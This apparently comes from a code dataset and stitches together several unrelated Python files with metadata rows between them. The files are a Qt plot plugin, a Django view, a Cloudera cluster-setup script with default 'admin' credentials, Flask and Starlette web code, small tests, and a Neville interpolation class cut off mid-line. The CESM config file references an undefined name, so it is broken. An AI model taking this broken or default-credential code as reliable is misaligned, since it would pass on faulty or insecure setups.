        if buttons & QtCore.Qt.LeftButton:
            button |= 0x1
        if buttons & QtCore.Qt.MidButton:
            button |= 0x2
        if buttons & QtCore.Qt.RightButton:
            button |= 0x4
        self.logger.debug("button down event at %dx%d, button=%x" % (
            x, y, button))

        self.plot_x, self.plot_y = x, y
        return True

    def plot_button_release(self, event):
        # note: for mouseRelease this needs to be button(), not buttons()!
        buttons = event.button()
        x, y = event.x(), event.y()

        button = self.kbdmouse_mask
        if buttons & QtCore.Qt.LeftButton:
            button |= 0x1
        if buttons & QtCore.Qt.MidButton:
            button |= 0x2
        if buttons & QtCore.Qt.RightButton:
            button |= 0x4
        self.logger.debug("button release at %dx%d button=%x" % (x, y, button))

    def plot_motion_notify(self, event):
        buttons = event.buttons()
        x, y = event.x(), event.y()

        button = 0
        if buttons & QtCore.Qt.LeftButton:
            button |= 0x1
        if buttons & QtCore.Qt.MidButton:
            button |= 0x2
        if buttons & QtCore.Qt.RightButton:
            button |= 0x4

        if button & 0x1:
            xdelta = x - self.plot_x
            ydelta = y - self.plot_y
            self.pan_plot(xdelta, ydelta)
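
    # Refactor sketch (hypothetical, not in the original plugin): the Qt
    # button -> bitmask translation above is repeated in three handlers and
    # could be collected into one helper, e.g.:
    # def _qt_buttons_to_mask(self, buttons):
    #     mask = 0
    #     if buttons & QtCore.Qt.LeftButton:
    #         mask |= 0x1
    #     if buttons & QtCore.Qt.MidButton:
    #         mask |= 0x2
    #     if buttons & QtCore.Qt.RightButton:
    #         mask |= 0x4
    #     return mask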
    def __str__(self):
        return 'pick'


class MyFigureCanvas(FigureCanvas):

    def setDelegate(self, delegate):
        self.delegate = delegate

    def keyPressEvent(self, event):
        self.delegate.pan_plot(event)

    def mousePressEvent(self, event):
        self.delegate.plot_button_press(event)

    def mouseReleaseEvent(self, event):
        self.delegate.plot_button_release(event)

    def mouseMoveEvent(self, event):
        self.delegate.plot_motion_notify(event)

    def wheelEvent(self, event):
        self.delegate.plot_scroll(event)

#END
| 34.401887 | 133 | 0.577744 | 2,193 | 18,233 | 4.69585 | 0.195622 | 0.030588 | 0.021752 | 0.022334 | 0.320451 | 0.26209 | 0.205574 | 0.173529 | 0.129346 | 0.101767 | 0 | 0.015315 | 0.301651 | 18,233 | 529 | 134 | 34.466919 | 0.79345 | 0.091373 | 0 | 0.173228 | 0 | 0.002625 | 0.08396 | 0 | 0 | 0 | 0.001819 | 0 | 0.002625 | 1 | 0.086614 | false | 0 | 0.020997 | 0.007874 | 0.146982 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
5b723c49946f52cdac915a09e27adab029ad9a35 | 715 | py | Python | django2/simpleDemo/blog/views.py | Gozeon/code-collections | 7304e2b9c4c91a809125198d22cf40dcbb45a23b | [
"MIT"
] | null | null | null | django2/simpleDemo/blog/views.py | Gozeon/code-collections | 7304e2b9c4c91a809125198d22cf40dcbb45a23b | [
"MIT"
] | 1 | 2020-07-17T09:25:42.000Z | 2020-07-17T09:25:42.000Z | django2/simpleDemo/blog/views.py | Gozeon/code-collections | 7304e2b9c4c91a809125198d22cf40dcbb45a23b | [
"MIT"
] | null | null | null | from django.shortcuts import render, redirect
from .models import Comment
from .forms import CommentForm

def index(request):
    comments = Comment.objects.order_by('-create_at')
    context = {'comments': comments}
    return render(request, 'blog/index.html', context)

def sign(request):
    if request.method == 'POST':
        form = CommentForm(request.POST)
        if form.is_valid():
            new_comment = Comment(name=request.POST['name'],
                                  comment=request.POST['comment'])
            new_comment.save()
            return redirect('index')
    else:
        form = CommentForm()  # bug fix: instantiate the form (the original bound the class itself)
    content = {'form': form}
    return render(request, 'blog/sign.html', content)
| 28.6 | 66 | 0.622378 | 79 | 715 | 5.56962 | 0.443038 | 0.075 | 0.086364 | 0.104545 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.258741 | 715 | 25 | 67 | 28.6 | 0.830189 | 0 | 0 | 0 | 0 | 0 | 0.099162 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.105263 | false | 0 | 0.157895 | 0 | 0.421053 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
5b73957f0a22b9435187079c42d5be88539e176e | 2,572 | py | Python | scripts/create_cluster.py | rnrbarbosa/CDPDCTrial | aecff49971ba35b6ec02d04846c1ff891d8bca45 | [
"Apache-2.0"
] | 7 | 2020-08-04T20:09:22.000Z | 2022-01-09T05:05:39.000Z | scripts/create_cluster.py | rnrbarbosa/CDPDCTrial | aecff49971ba35b6ec02d04846c1ff891d8bca45 | [
"Apache-2.0"
] | 1 | 2020-12-09T13:18:45.000Z | 2022-01-08T17:41:39.000Z | scripts/create_cluster.py | rnrbarbosa/CDPDCTrial | aecff49971ba35b6ec02d04846c1ff891d8bca45 | [
"Apache-2.0"
] | 14 | 2020-09-03T14:19:10.000Z | 2022-02-21T20:03:31.000Z | from __future__ import print_function
import cm_client
from cm_client.rest import ApiException
from collections import namedtuple
from pprint import pprint
import json
import time
import sys
def wait(cmd, timeout=None):
    SYNCHRONOUS_COMMAND_ID = -1
    if cmd.id == SYNCHRONOUS_COMMAND_ID:
        return cmd

    SLEEP_SECS = 5
    if timeout is None:
        deadline = None
    else:
        deadline = time.time() + timeout

    try:
        cmd_api_instance = cm_client.CommandsResourceApi(api_client)
        while True:
            # bug fix: the original used long(), which does not exist in Python 3
            cmd = cmd_api_instance.read_command(int(cmd.id))
            pprint(cmd)
            if not cmd.active:
                return cmd
            if deadline is not None:
                now = time.time()
                if deadline < now:
                    return cmd
                else:
                    time.sleep(min(SLEEP_SECS, deadline - now))
            else:
                time.sleep(SLEEP_SECS)
    except ApiException as e:
        print("Exception when calling ClouderaManagerResourceApi->import_cluster_template: %s\n" % e)
cm_client.configuration.username = 'admin'
cm_client.configuration.password = 'admin'
api_client = cm_client.ApiClient("http://cloudera:7180/api/v40")
cm_api = cm_client.ClouderaManagerResourceApi(api_client)

# accept trial licence
# cm_api.begin_trial()

# Install CM Agent on host
with open("/root/myRSAkey", "r") as f:
    key = f.read()

instargs = cm_client.ApiHostInstallArguments(
    host_names=['YourHostname'],
    user_name='root',
    private_key=key,
    cm_repo_url='https://archive.cloudera.com/cm7/7.1.4/',
    java_install_strategy='NONE',
    ssh_port=22,
    passphrase='')

cmd = cm_api.host_install_command(body=instargs)
wait(cmd)

# create MGMT/CMS
mgmt_api = cm_client.MgmtServiceResourceApi(api_client)
api_service = cm_client.ApiService()
api_service.roles = [cm_client.ApiRole(type='SERVICEMONITOR'),
                     cm_client.ApiRole(type='HOSTMONITOR'),
                     cm_client.ApiRole(type='EVENTSERVER'),
                     cm_client.ApiRole(type='ALERTPUBLISHER')]
mgmt_api.auto_assign_roles()  # needed?
mgmt_api.auto_configure()  # needed?
mgmt_api.setup_cms(body=api_service)
cmd = mgmt_api.start_command()
wait(cmd)

# create the cluster using the template
with open(sys.argv[1]) as f:
    json_str = f.read()
Response = namedtuple("Response", "data")
dst_cluster_template = api_client.deserialize(response=Response(json_str), response_type=cm_client.ApiClusterTemplate)
cmd = cm_api.import_cluster_template(add_repositories=True, body=dst_cluster_template)
wait(cmd)
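
# Possible follow-up (not in the original script): after the template import
# finishes, the new cluster still has to be started. The cluster name below is
# an assumption about what the template created.
# clusters_api = cm_client.ClustersResourceApi(api_client)
# wait(clusters_api.start_command('Cluster 1'))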
| 27.956522 | 115 | 0.692846 | 333 | 2,572 | 5.12012 | 0.396396 | 0.070381 | 0.035191 | 0.044575 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.007349 | 0.206454 | 2,572 | 91 | 116 | 28.263736 | 0.828025 | 0.052488 | 0 | 0.134328 | 0 | 0 | 0.104613 | 0.021417 | 0 | 0 | 0 | 0 | 0 | 1 | 0.014925 | false | 0.029851 | 0.149254 | 0 | 0.208955 | 0.059701 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
5b73b791ebd04c2f9222a3d5b07d99e182af0ec3 | 447 | py | Python | codefestival_2016_final_b.py | hythof/atc | 12cb94ebe693e1f469ce0d982bc2924b586552cd | [
"CC0-1.0"
] | null | null | null | codefestival_2016_final_b.py | hythof/atc | 12cb94ebe693e1f469ce0d982bc2924b586552cd | [
"CC0-1.0"
] | null | null | null | codefestival_2016_final_b.py | hythof/atc | 12cb94ebe693e1f469ce0d982bc2924b586552cd | [
"CC0-1.0"
] | null | null | null | n=int(input())
def findMax(n):
    l = 0
    r = n
    while r - l >= 2:
        m1 = l + (r - l) // 2
        m2 = m1 + 1
        s1 = (m1 + 1) * (m1 / 2)
        s2 = (m2 + 1) * (m2 / 2)
        if s2 >= n > s1:
            return m2
        elif s1 < n:
            l = m1
        else:
            r = m1
    return 1
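
# Sanity sketch (not in the original submission): findMax(n) bisects for the
# smallest m with m*(m+1)/2 >= n, e.g. 1+2+3 >= 4 gives findMax(4) == 3.
# assert findMax(4) == 3 and findMax(6) == 3 and findMax(7) == 4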
def printLines(n, m):
    for i in range(m, -1, -1):
        if i <= n:
            print(i)
            n -= i
            if n == 0:
                break

printLines(n, findMax(n))
| 17.88 | 28 | 0.373602 | 74 | 447 | 2.256757 | 0.364865 | 0.095808 | 0.035928 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.112033 | 0.46085 | 447 | 24 | 29 | 18.625 | 0.580913 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.083333 | false | 0 | 0 | 0 | 0.166667 | 0.125 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
5b7674325078da66bb522f08c9f888feac4e3166 | 483 | py | Python | test/test_pre_flight.py | gregbanks/atlascli | 381966c4a042c3769d14167d5db7b5abb9a7c6e0 | [
"Apache-2.0"
] | null | null | null | test/test_pre_flight.py | gregbanks/atlascli | 381966c4a042c3769d14167d5db7b5abb9a7c6e0 | [
"Apache-2.0"
] | null | null | null | test/test_pre_flight.py | gregbanks/atlascli | 381966c4a042c3769d14167d5db7b5abb9a7c6e0 | [
"Apache-2.0"
] | null | null | null | import unittest
from atlascli.commands import Commands
from atlascli.atlasmap import AtlasMap
class TestPreFlight(unittest.TestCase):
def test_preflight(self):
map = AtlasMap()
map.authenticate()
c = Commands(map)
with self.assertRaises(SystemExit) as e:
c.preflight_cluster_arg("xxxxx")
print(f"raised '{e}'")
a = c.preflight_cluster_arg("demodata")
print(a)
if __name__ == '__main__':
unittest.main()
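# A network-free variant of this test (hypothetical sketch; `AtlasMap` and
# `Commands` as imported above) could stub out authentication so it runs
# without live Atlas credentials:
#
#   from unittest.mock import patch
#   with patch.object(AtlasMap, "authenticate", return_value=None):
#       c = Commands(AtlasMap())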
| 24.15 | 48 | 0.652174 | 55 | 483 | 5.490909 | 0.581818 | 0.07947 | 0.112583 | 0.13245 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.242236 | 483 | 19 | 49 | 25.421053 | 0.825137 | 0 | 0 | 0 | 0 | 0 | 0.068323 | 0 | 0 | 0 | 0 | 0 | 0.066667 | 1 | 0.066667 | false | 0 | 0.2 | 0 | 0.333333 | 0.133333 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
5b76d1c0d954a8965e785d0d46268bbbacc88062 | 1,357 | py | Python | idealplanets/environment.py | bnb32/spring_onset | f856e839c38c7eb72c8f6148fa1c82e880925370 | [
"MIT"
] | null | null | null | idealplanets/environment.py | bnb32/spring_onset | f856e839c38c7eb72c8f6148fa1c82e880925370 | [
"MIT"
] | null | null | null | idealplanets/environment.py | bnb32/spring_onset | f856e839c38c7eb72c8f6148fa1c82e880925370 | [
"MIT"
] | null | null | null | import os
USERNAME='bbenton'
PROJECT_CODE='UCOR0044'
MAIN_DIR='/glade/u/home/'+USERNAME+'/spring_onset/'
MY_CESM_DIR=MAIN_DIR+'/my_cesm'
POST_PROC_DIR=MAIN_DIR+'/idealplanets/postprocessing/'
PRE_PROC_DIR=MAIN_DIR+'/idealplanets/preprocessing/'
SCRATCH_DIR='/glade/scratch/'+USERNAME+'/'
CIME_OUTPUT_ROOT=SCRATCH_DIR+'/cases/'
CESM_DATA_DIR=SCRATCH_DIR+'/cesm_data/'
CESM_SCRIPTS=MY_CESM_DIR+'/cime/scripts/'
CESM_CAM_OUT_DIR=SCRATCH_DIR+'/archive/%s/atm/hist/'
ORIG_DATA_DIR='/glade/p/cesmdata/cseg/inputdata/'
ORIG_TOPO_DIR=ORIG_DATA_DIR+'/atm/cam/topo/'
ORIG_TREF_DIR=MAIN_DIR+'/trefread/NCL/output/'
ORIG_SST_DIR=ORIG_DATA_DIR+'/ocn/docn7/AQUAPLANET/'
#ORIG_SST_DIR="%s/atm/cam/sst/"%(ORIG_DATA_DIR)
#ORIG_TOPO_FILE="%s/USGS-gtopo30_0.9x1.25_remap_c051027.nc"%(ORIG_TOPO_DIR)
ORIG_TOPO_FILE=ORIG_TOPO_DIR+'/USGS-gtopo30_64x128_c050520.nc'
ORIG_TREF_FILE=ORIG_TREF_DIR+'/tref_T85L30.nc'
ORIG_SST_FILE=ORIG_SST_DIR+'/sst_c4aquasom_0.9x1.25_clim.c170512.nc'
#ORIG_SST_FILE="%s/sst_HadOIBl_bc_64x128_clim_c110526.nc"%(ORIG_SST_DIR)
BASE_SST_FILE='aqua_sst.nc'
BASE_TOPO_FILE='drycore_topo.nc'
BASE_TREF_FILE='drycore_tref.nc'
#AQUA_RES="T42_T42_mg17"
AQUA_RES="f09_f09_mg17"
AQUA_COMPSET="QPC6"
#DRYCORE_RES="T42z30_T42_mg17"
DRYCORE_RES="T85z30_T85_mg17"
#DRYCORE_RES="f09z30_f09_mg17"
DRYCORE_COMPSET="FHS94"
os.environ["PATH"]+=":%s"%env.CESM_SCRIPTS
| 37.694444 | 75 | 0.812822 | 234 | 1,357 | 4.260684 | 0.354701 | 0.042126 | 0.04012 | 0.028084 | 0.052156 | 0 | 0 | 0 | 0 | 0 | 0 | 0.073485 | 0.027266 | 1,357 | 35 | 76 | 38.771429 | 0.681818 | 0.201179 | 0 | 0 | 0 | 0 | 0.404453 | 0.207792 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.037037 | 0 | 0.037037 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
5b77172878c48e201c7ca6f3a1acef26fd66d49d | 5,316 | py | Python | app/services/routes/service.py | codepointtku/viuhka-flask | e51382a306675efabebe2a47d0ae54b7abcdb884 | [
"MIT"
] | null | null | null | app/services/routes/service.py | codepointtku/viuhka-flask | e51382a306675efabebe2a47d0ae54b7abcdb884 | [
"MIT"
] | 1 | 2021-06-02T00:32:26.000Z | 2021-06-02T00:32:26.000Z | app/services/routes/service.py | codepointtku/viuhka-flask | e51382a306675efabebe2a47d0ae54b7abcdb884 | [
"MIT"
] | 1 | 2019-11-29T05:46:59.000Z | 2019-11-29T05:46:59.000Z | from flask import Blueprint, render_template, request, redirect, Response, url_for
from flask_login import login_required, current_user
from flask_wtf.csrf import validate_csrf
from app.services.models.service import ( Service, get_services, find_service,
amount, create_new, paginate_service_owner_id )
from app.services.forms.service import ServiceForm
from app.services.models.category import get_category, sequalized_categories
from app.utils import root, join, exit, paginate
from wtforms.fields.simple import TextAreaField
import json
import pickle
module = Blueprint('service', __name__)
_name_ = 'Services'
@module.route('/service/list', methods=['GET'])
def list_service():
page = request.args.get('page', 1, int)
if current_user.rank().level < 2:
services = paginate_service_owner_id(current_user.id, page=page, per_page=25)
else:
services = paginate(Service.query, page=page, per_page=25)
return render_template('splash/actions/services/list.html', services=services, amount=amount, current_page=page)
@module.route('/admin/service', methods=['GET', 'POST'])
@login_required
def service():
    _type = str(request.args.get('type'))
    id = request.args.get('id', 0, int)  # coerce to int so the `id == 0` guards below can fire
if _type == 'edit':
if request.method == 'GET':
if id == 0:
return redirect(url_for('service.services'))
service = find_service(id)
if service:
form = ServiceForm()
try:
form.category_items.process_data([v for v in service.category_items.values()])
                except Exception:  # category_items may be a list or None with no .values()
form.category_items.process_data([] if service.category_items is None else service.category_items)
for ff in form.__dict__:
for sf in service.__dict__:
if ff == sf:
if isinstance(form.__dict__[ff], TextAreaField):
form.__dict__[ff].process_data(service.__dict__[sf])
try:
if service.start: form.start.data = str(service.start).replace(' ','T')
if service.end: form.end.data = str(service.end).replace(' ','T')
                except Exception:
                    pass  # leave start/end untouched when they are missing or unparsable
return render_template('admin/pages/services/_edit.html', service=service, form=form, categories=sequalized_categories)
return render_template('admin/pages/404.html', reason='Service', content='Not found')
else:
form = ServiceForm(request.form)
service = find_service(id)
owner = service.owner_id # cache
if form.start.data is None and service.start is not None:
form.start.data = service.start
if form.end.data is None and service.end is not None:
form.end.data = service.end
service.__init__(**form.data)
service.owner_id = owner
validate_csrf(service.csrf_token)
service.save()
try:
if find_service(service.id):
return json.dumps({
'success': True
}), 200, {'ContentType':'application/json'}
            except Exception:
                pass  # fall through to the failure response below
return json.dumps({
'success': False
}), 400, {'ContentType':'application/json'}
elif _type == 'add':
form = ServiceForm(request.form)
service = Service(
**form.data
)
if current_user.rank().level < 1:
service.owner_id = current_user.id
validate_csrf(service.csrf_token)
        try:
            service.category_items = dict(enumerate(service.category_items))
        except TypeError:
            pass  # category_items is not iterable; keep it as-is
service.save()
try:
if find_service(service.id):
return json.dumps({
'success': True,
'service_id': str(service.id)
}), 200, {"ContentType":"Application/Json"}
        except Exception:
            pass  # fall through to the failure response below
return json.dumps({
'success':False,
}), 400, {'ContentType':'application/json'}
elif _type == 'new':
if request.method == 'GET':
return render_template('admin/pages/services/_new.html', form=ServiceForm(), categories=sequalized_categories)
return redirect(url_for('service.services'))
elif _type == 'delete':
if id == 0:
return redirect(url_for('service.services'))
service = find_service(id)
if service:
service.delete()
return redirect(url_for('service.services'))
@module.route('/admin/services', methods=['GET'])
@login_required
def services():
page = request.args.get('page', 1, int)
if current_user.rank().level < 2:
services = paginate_service_owner_id(current_user.id, page=page, per_page=25)
else:
services = paginate(Service.query, page=page, per_page=25)
return render_template('admin/pages/services/services.html',
services=services, amount=amount) | 40.580153 | 135 | 0.569789 | 571 | 5,316 | 5.119089 | 0.204904 | 0.026343 | 0.028738 | 0.020527 | 0.461512 | 0.347246 | 0.281902 | 0.281902 | 0.281902 | 0.281902 | 0 | 0.00834 | 0.323363 | 5,316 | 131 | 136 | 40.580153 | 0.804281 | 0.000941 | 0 | 0.447368 | 0 | 0 | 0.091149 | 0.024105 | 0 | 0 | 0 | 0 | 0 | 1 | 0.026316 | false | 0.035088 | 0.087719 | 0 | 0.22807 | 0.017544 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
5b78c81118416d931976b8f9e56f5af3adf5b603 | 5,799 | py | Python | src/idom/backend/starlette.py | jmtaysom/idom | d2a569d27f915d3b2b1fc6eb8eef9aca3a6d9343 | [
"MIT"
] | 55 | 2019-02-28T23:58:42.000Z | 2020-07-14T22:01:45.000Z | src/idom/backend/starlette.py | jmtaysom/idom | d2a569d27f915d3b2b1fc6eb8eef9aca3a6d9343 | [
"MIT"
] | 72 | 2019-04-04T18:46:30.000Z | 2020-06-24T02:47:57.000Z | src/idom/backend/starlette.py | jmtaysom/idom | d2a569d27f915d3b2b1fc6eb8eef9aca3a6d9343 | [
"MIT"
] | 7 | 2019-04-02T17:53:30.000Z | 2020-06-23T16:17:58.000Z | from __future__ import annotations
import asyncio
import json
import logging
from dataclasses import dataclass
from typing import Any, Awaitable, Callable, Dict, Tuple, Union
from starlette.applications import Starlette
from starlette.middleware.cors import CORSMiddleware
from starlette.staticfiles import StaticFiles
from starlette.types import Receive, Scope, Send
from starlette.websockets import WebSocket, WebSocketDisconnect
from idom.backend.types import Location
from idom.config import IDOM_WEB_MODULES_DIR
from idom.core.hooks import Context, create_context, use_context
from idom.core.layout import Layout, LayoutEvent
from idom.core.serve import (
RecvCoroutine,
SendCoroutine,
VdomJsonPatch,
serve_json_patch,
)
from idom.core.types import RootComponentConstructor
from ._asgi import serve_development_asgi
from .utils import CLIENT_BUILD_DIR, safe_client_build_dir_path
logger = logging.getLogger(__name__)
WebSocketContext: type[Context[WebSocket | None]] = create_context(
None, "WebSocketContext"
)
def configure(
app: Starlette,
constructor: RootComponentConstructor,
options: Options | None = None,
) -> None:
"""Return a :class:`StarletteServer` where each client has its own state.
Implements the :class:`~idom.server.proto.ServerFactory` protocol
Parameters:
app: An application instance
constructor: A component constructor
options: Options for configuring server behavior
"""
options = options or Options()
# this route should take priority so set up it up first
_setup_single_view_dispatcher_route(options, app, constructor)
_setup_common_routes(options, app)
def create_development_app() -> Starlette:
"""Return a :class:`Starlette` app instance in debug mode"""
return Starlette(debug=True)
async def serve_development_app(
app: Starlette,
host: str,
port: int,
started: asyncio.Event | None = None,
) -> None:
"""Run a development server for starlette"""
await serve_development_asgi(app, host, port, started)
def use_location() -> Location:
"""Get the current route as a string"""
scope = use_scope()
pathname = "/" + scope["path_params"].get("path", "")
search = scope["query_string"].decode()
return Location(pathname, "?" + search if search else "")
def use_scope() -> Scope:
"""Get the current ASGI scope dictionary"""
return use_websocket().scope
def use_websocket() -> WebSocket:
"""Get the current WebSocket object"""
websocket = use_context(WebSocketContext)
if websocket is None:
raise RuntimeError( # pragma: no cover
"No websocket. Are you running with a Starllette server?"
)
return websocket
@dataclass
class Options:
"""Optionsuration options for :class:`StarletteRenderServer`"""
cors: Union[bool, Dict[str, Any]] = False
"""Enable or configure Cross Origin Resource Sharing (CORS)
For more information see docs for ``starlette.middleware.cors.CORSMiddleware``
"""
serve_static_files: bool = True
"""Whether or not to serve static files (i.e. web modules)"""
url_prefix: str = ""
"""The URL prefix where IDOM resources will be served from"""
def _setup_common_routes(options: Options, app: Starlette) -> None:
cors_options = options.cors
if cors_options: # pragma: no cover
cors_params = (
cors_options if isinstance(cors_options, dict) else {"allow_origins": ["*"]}
)
app.add_middleware(CORSMiddleware, **cors_params)
# This really should be added to the APIRouter, but there's a bug in Starlette
# BUG: https://github.com/tiangolo/fastapi/issues/1469
url_prefix = options.url_prefix
if options.serve_static_files:
wm_dir = IDOM_WEB_MODULES_DIR.current
web_module_files = StaticFiles(directory=wm_dir, html=True, check_dir=False)
app.mount(url_prefix + "/_api/modules", web_module_files)
app.mount(url_prefix + "/{_:path}/_api/modules", web_module_files)
# register this last so it takes least priority
app.mount(url_prefix + "/", single_page_app_files())
def single_page_app_files() -> Callable[..., Awaitable[None]]:
static_files_app = StaticFiles(
directory=CLIENT_BUILD_DIR,
html=True,
check_dir=False,
)
async def spa_app(scope: Scope, receive: Receive, send: Send) -> None:
# Path safety is the responsibility of starlette.staticfiles.StaticFiles -
# using `safe_client_build_dir_path` is for convenience in this case.
path = safe_client_build_dir_path(scope["path"]).name
return await static_files_app({**scope, "path": path}, receive, send)
return spa_app
def _setup_single_view_dispatcher_route(
options: Options, app: Starlette, constructor: RootComponentConstructor
) -> None:
@app.websocket_route(options.url_prefix + "/_api/stream")
@app.websocket_route(options.url_prefix + "/{path:path}/_api/stream")
async def model_stream(socket: WebSocket) -> None:
await socket.accept()
send, recv = _make_send_recv_callbacks(socket)
try:
await serve_json_patch(
Layout(WebSocketContext(constructor(), value=socket)),
send,
recv,
)
except WebSocketDisconnect as error:
logger.info(f"WebSocket disconnect: {error.code}")
def _make_send_recv_callbacks(
socket: WebSocket,
) -> Tuple[SendCoroutine, RecvCoroutine]:
async def sock_send(value: VdomJsonPatch) -> None:
await socket.send_text(json.dumps(value))
async def sock_recv() -> LayoutEvent:
return LayoutEvent(**json.loads(await socket.receive_text()))
return sock_send, sock_recv
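# Example wiring (a minimal sketch; `HelloWorld` is a hypothetical
# idom component, not part of this module):
#
#   app = create_development_app()
#   configure(app, HelloWorld)
#   asyncio.run(serve_development_app(app, "127.0.0.1", 8000))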
| 32.038674 | 88 | 0.703914 | 705 | 5,799 | 5.6 | 0.321986 | 0.020517 | 0.017731 | 0.013678 | 0.090172 | 0.047619 | 0 | 0 | 0 | 0 | 0 | 0.000863 | 0.201069 | 5,799 | 180 | 89 | 32.216667 | 0.851284 | 0.155372 | 0 | 0.044643 | 0 | 0 | 0.050465 | 0.010182 | 0 | 0 | 0 | 0 | 0 | 1 | 0.080357 | false | 0 | 0.169643 | 0 | 0.357143 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
5b79cabe84902f79ff0d8c0db3006962e902cb92 | 650 | py | Python | python/tests/strings/test_lsd_string_sort.py | rcanepa/cs-fundamentals | b362fc206417501e53a5739df1edf7568901eef8 | [
"MIT"
] | null | null | null | python/tests/strings/test_lsd_string_sort.py | rcanepa/cs-fundamentals | b362fc206417501e53a5739df1edf7568901eef8 | [
"MIT"
] | null | null | null | python/tests/strings/test_lsd_string_sort.py | rcanepa/cs-fundamentals | b362fc206417501e53a5739df1edf7568901eef8 | [
"MIT"
] | null | null | null | import unittest
from strings.lsd_string_sort import lsd_sort
class LSDSort(unittest.TestCase):
def setUp(self):
self.licenses = [
"4PGC938",
"2IYE230",
"3CI0720",
"1ICK750",
"1OHV845",
"4JZY524",
"1ICK750",
"3CI0720",
"1OHV845",
"1OHV845",
"2RLA629",
"2RLA629",
"3ATW723"
]
def test_strings_are_sorted(self):
sorted_data = lsd_sort(self.licenses)
manually_sorted_data = sorted(self.licenses)
self.assertEqual(sorted_data, manually_sorted_data) | 25 | 59 | 0.526154 | 57 | 650 | 5.77193 | 0.491228 | 0.121581 | 0.109422 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.132678 | 0.373846 | 650 | 26 | 59 | 25 | 0.675676 | 0 | 0 | 0.391304 | 0 | 0 | 0.139785 | 0 | 0 | 0 | 0 | 0 | 0.043478 | 1 | 0.086957 | false | 0 | 0.086957 | 0 | 0.217391 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
5b7fc793ffe2598f7fc3e99084535d7e8a02825e | 2,523 | py | Python | Neville.py | VdeThevenin/Lagrange-Neville | 35081615556d405dba30f874494e382ea5881817 | [
"CC0-1.0"
] | null | null | null | Neville.py | VdeThevenin/Lagrange-Neville | 35081615556d405dba30f874494e382ea5881817 | [
"CC0-1.0"
] | null | null | null | Neville.py | VdeThevenin/Lagrange-Neville | 35081615556d405dba30f874494e382ea5881817 | [
"CC0-1.0"
] | null | null | null | """
Neville interpolation class file (computes the Lagrange interpolating polynomial via Neville's algorithm)
"""
import sympy as sp
import numpy as np
from time import process_time as timer
class Neville:
def __init__(self):
self.Q = []
self.time_ellapsed = 0
self.x = np.array([])
self.y = np.array([])
self._x = sp.symbols('x', real=True)
def clear_data(self):
self.Q = []
    def start(self, data=None):
        # Avoid the mutable-default-argument pitfall; treat missing/empty data as an error.
        if not data:
            raise ValueError("Invalid data!")
self.clear_data()
self.x = np.array(data[0].copy())
self.y = np.array(data[1].copy())
self.treat_data()
sp.init_printing()
x = self._x
qtd = self.x.size
for idx in range(qtd):
self.Q.append([0] * (qtd - idx))
self.Q = np.array(self.Q, dtype="object")
for idx in range(qtd):
self.Q[0][idx] = self.y[idx]
time0 = timer()
for degree in range(1, qtd):
for idx in range(len(self.Q[degree - 1]) - 1):
                # Neville recurrence:
                # Q[d][i] = ((x - x_i) * Q[d-1][i+1] - (x - x_{i+d}) * Q[d-1][i]) / (x_{i+d} - x_i)
self.Q[degree][idx] = (x - self.x[idx]) * self.Q[degree - 1][idx + 1]
